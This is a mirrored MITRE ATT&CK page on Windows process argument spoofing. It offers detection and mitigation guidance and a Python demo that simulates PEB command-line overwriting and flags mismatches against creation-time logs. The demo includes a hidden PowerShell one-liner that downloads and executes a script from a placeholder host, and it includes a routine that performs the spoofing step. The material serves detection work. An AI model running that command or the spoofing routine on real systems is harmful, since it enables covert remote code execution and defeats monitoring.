T1564.010: Process Argument Spoofing
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.[1][2]
Adversaries may manipulate a process's PEB to evade defenses. For example, Process Hollowing-style creation can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may overwrite the PEB command-line string (e.g., with WriteProcessMemory(), the Win32 wrapper around the native NtWriteVirtualMemory() call) and then resume execution so the process runs with the malicious arguments.[3][2][4]
Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.[5]
This behavior may also be combined with other tricks (such as Parent PID Spoofing) to manipulate or further evade process-based detections.
Analyst context for executives and security teams
Process Argument Spoofing matters because it can make Windows process command-line evidence look benign or incomplete after a process has started. Many SOC workflows, incident timelines, and audit reconstructions rely heavily on command-line logging to explain what ran and why. If attackers can alter the process environment block memory that tools read, defenders may see one set of arguments at creation time and a different or sanitized view later.
Executive priority
Treat this as a Windows endpoint visibility and investigation-confidence issue. Leadership should ask whether security teams can preserve trustworthy process creation records, correlate them with later memory/process state, and identify cases where command-line evidence may have been manipulated. This is especially relevant for incident response readiness, managed detection quality, and control validation where process-based detections are used as evidence for ransomware or post-exploitation activity. The ATT&CK relationships to Cobalt Strike and SombRAT make this worth validating in environments that prioritize detection of post-exploitation tooling, but the supplied data does not establish current exposure or active exploitation.
Technical view
This is a Windows stealth sub-technique under Hide Artifacts. The ATT&CK description centers on manipulation of the process environment block after creation: either a process is started with benign arguments, logged by sensors, and its memory is overwritten before execution continues, or a process is started with malicious arguments that are later patched to appear benign during memory review. SOC and IR teams should validate whether process creation telemetry is captured at creation time, whether later process inspections depend on mutable PEB command-line values, and whether detections account for inconsistencies involving process hollowing, cross-process memory writes such as WriteProcessMemory() or NtWriteVirtualMemory(), and possible Parent PID Spoofing context. The related DET0045 detection strategy indicates there is ATT&CK detection-strategy context for this object, but the official detection field for the technique itself is not provided here.
Likely telemetry
- Windows process creation events with original command-line arguments
- Endpoint detection and response process start telemetry
- Process memory inspection artifacts, especially PEB command-line values
- API or behavioral telemetry for process memory modification such as WriteProcessMemory()
- Suspended process creation and resume activity where available
Detection direction
- Compare command-line values captured at process creation against later process memory or EDR-enriched command-line views where tooling supports both.
- Tune detections for suspicious mismatch patterns rather than relying on a single command-line source as authoritative.
- Review process hollowing and suspended-process execution analytics for cases where benign-looking command lines mask later behavior.
- Use parent/child process lineage carefully, because the ATT&CK description notes this behavior may be combined with Parent PID Spoofing.
- Account for false positives from legitimate software that modifies process memory or uses unusual process creation patterns; require corroborating context before escalation.
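The technique description above and the detection direction in this list both reduce to one comparison: what a creation-time sensor recorded versus what the PEB says now. The following added example (written for this page; not code from MITRE, Cobalt Strike, or any of the cited posts) walks an x64 PEB in a constructed memory snapshot to read the CommandLine UNICODE_STRING, reproduces the adversary's overwrite-and-shrink-Length trick against that snapshot, and flags two inconsistencies: a Length field shorter than the NUL-terminated buffer content, and buffer content that no longer matches the creation-time record. The structure offsets (PEB.ProcessParameters at 0x20, RTL_USER_PROCESS_PARAMETERS.CommandLine at 0x70) are the documented x64 winternl.h layouts; the Snapshot class, the addresses, and the sample command lines are constructed for the demonstration.

```python
import struct

# x64 layouts from the public winternl.h definitions (assumed; confirm against
# ntdll symbols for the Windows build you analyse).
PEB_PROCESS_PARAMETERS = 0x20          # PEB.ProcessParameters (pointer)
RUPP_COMMAND_LINE = 0x70               # RTL_USER_PROCESS_PARAMETERS.CommandLine
UNICODE_STRING = struct.Struct("<HH4xQ")  # Length, MaximumLength, pad, Buffer


class Snapshot:
    """Flat memory image keyed by virtual address: a constructed stand-in for
    ReadProcessMemory()/WriteProcessMemory() or a minidump."""

    def __init__(self):
        self._regions = {}

    def map(self, base, data):
        self._regions[base] = bytearray(data)

    def _locate(self, addr, size):
        for base, buf in self._regions.items():
            if base <= addr and addr + size <= base + len(buf):
                return buf, addr - base
        raise ValueError(f"unmapped range {addr:#x}+{size:#x}")

    def read(self, addr, size):
        buf, off = self._locate(addr, size)
        return bytes(buf[off:off + size])

    def write(self, addr, data):
        buf, off = self._locate(addr, len(data))
        buf[off:off + len(data)] = data


def _command_line_string(snap, peb):
    """Address of the CommandLine UNICODE_STRING and its unpacked fields."""
    (params,) = struct.unpack("<Q", snap.read(peb + PEB_PROCESS_PARAMETERS, 8))
    addr = params + RUPP_COMMAND_LINE
    return addr, UNICODE_STRING.unpack(snap.read(addr, UNICODE_STRING.size))


def read_peb_command_line(snap, peb):
    """Return (declared, full): what a tool honouring Length shows, and the
    NUL-terminated text actually present in the buffer."""
    _, (length, max_length, buffer) = _command_line_string(snap, peb)
    declared = snap.read(buffer, length).decode("utf-16-le")
    raw = snap.read(buffer, max_length).decode("utf-16-le", errors="replace")
    return declared, raw.split("\x00", 1)[0]


def spoof_command_line(snap, peb, new_cmdline, visible_chars=None):
    """What the adversary does between CreateProcess(CREATE_SUSPENDED) and
    ResumeThread(): overwrite the buffer in place and, optionally, shrink
    Length so PEB readers see only a prefix. The NUL terminator still marks
    the end of the string the process itself will parse."""
    addr, (_, max_length, buffer) = _command_line_string(snap, peb)
    encoded = new_cmdline.encode("utf-16-le") + b"\x00\x00"
    if len(encoded) > max_length:
        raise ValueError("new command line exceeds the original allocation")
    snap.write(buffer, encoded)
    shown = new_cmdline if visible_chars is None else new_cmdline[:visible_chars]
    snap.write(addr, UNICODE_STRING.pack(len(shown) * 2, max_length, buffer))


def compare(creation_cmdline, snap, peb):
    """Flag PEB/creation-record inconsistencies. The creation-time record is
    the trustworthy copy; the PEB is mutable and only corroborates it."""
    declared, full = read_peb_command_line(snap, peb)
    flags = []
    if declared != full:
        flags.append("length_truncated")        # Length hides part of the buffer
    if full != creation_cmdline:
        flags.append("changed_after_creation")  # memory no longer matches the log
    return {"creation": creation_cmdline, "peb_declared": declared,
            "peb_full": full, "flags": flags}


def build_snapshot(cmdline):
    """Minimal PEB, process parameters and command-line buffer at constructed
    addresses, laid out as they stand right after process creation."""
    peb_addr, params_addr, buf_addr = 0x7FF5_0000_0000, 0x1_0000_2000, 0x1_0000_4000
    encoded = cmdline.encode("utf-16-le") + b"\x00\x00"
    peb = bytearray(0x40)
    peb[PEB_PROCESS_PARAMETERS:PEB_PROCESS_PARAMETERS + 8] = struct.pack("<Q", params_addr)
    params = bytearray(0x80)
    params[RUPP_COMMAND_LINE:RUPP_COMMAND_LINE + UNICODE_STRING.size] = UNICODE_STRING.pack(
        len(encoded) - 2, len(encoded), buf_addr)
    snap = Snapshot()
    for base, data in ((peb_addr, peb), (params_addr, params), (buf_addr, encoded)):
        snap.map(base, data)
    return snap, peb_addr


# Constructed Sysmon-style creation record: benign arguments padded with spaces
# so the allocation is large enough for the real command line written later.
CREATION_CMDLINE = "powershell.exe -NoProfile -Command Get-Date" + " " * 60
REAL_CMDLINE = 'powershell.exe -nop -w hidden -c "IEX (iwr http://example.invalid/s.ps1)"'


def demo():
    """Creation-time view, then the view after the PEB has been rewritten."""
    snap, peb = build_snapshot(CREATION_CMDLINE)
    before = compare(CREATION_CMDLINE, snap, peb)
    spoof_command_line(snap, peb, REAL_CMDLINE, visible_chars=len("powershell.exe"))
    after = compare(CREATION_CMDLINE, snap, peb)
    return before, after
```

On a live host, Snapshot would be replaced by ReadProcessMemory() over the PEB base obtained from NtQueryInformationProcess(ProcessBasicInformation), or by a minidump reader, and the creation-time string would come from Sysmon Event ID 1 or Security 4688 with command-line auditing enabled. The same compare() also covers the FiveHands-style reverse case (malicious at creation, patched benign later): there the "changed_after_creation" flag fires alone, and the creation record, not the PEB, is the one to believe.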
Mitigation priorities
- Prioritize high-fidelity process creation logging on Windows so original command-line arguments are retained before later memory changes can confuse analysis.
- Ensure EDR/SOC procedures preserve immutable event-time records and do not depend only on live process queries during investigations.
- Correlate command-line telemetry with memory-modification behavior, process ancestry, and process injection or hollowing indicators.
- Strengthen incident response playbooks to flag command-line inconsistencies as evidence-quality risks, not just as isolated alerts.
- Use adversary emulation or controlled validation to confirm whether existing tools expose or miss argument spoofing behavior, without assuming vendor coverage from ATT&CK alone.
Analyst notes and limits
The supplied object has no official ATT&CK detection text, so this take focuses on validation direction derived from the description, Windows platform scope, stealth tactic, and relationships. The software relationships to Cobalt Strike and SombRAT support prioritizing this behavior in post-exploitation detection reviews, but they should not be read as proof of activity in any specific environment.
This assessment is limited to the supplied ATT&CK fields, external references, and relationships. It does not include local log sources, vendor capabilities, prevalence, active exploitation status, or organization-specific exposure. Detection feasibility depends on the exact Windows telemetry, EDR behavior, retention, and memory-analysis practices in place.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Related techniques
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1564 | Hide Artifacts | This object is a sub-technique of Hide Artifacts. |
Groups, software, and campaigns
S0154: Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]
S0615: SombRAT
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 2.0 | | Current bundle | 789524eb03db… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Microsoft PEB 2021: Microsoft. (2021, October 6). PEB structure (winternl.h). Retrieved November 19, 2021.
[2] Xpn Argue Like Cobalt 2019: Chester, A. (2019, January 28). How to Argue like Cobalt Strike. Retrieved November 19, 2021.
[3] Cobalt Strike Arguments 2019: Mudge, R. (2019, January 2). https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/. Retrieved November 19, 2021.
[4] Nviso Spoof Command Line 2020: Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.
[5] FireEye FiveHands April 2021: McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.
[6] mitre-attack: T1564.010, MITRE ATT&CK technique page.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.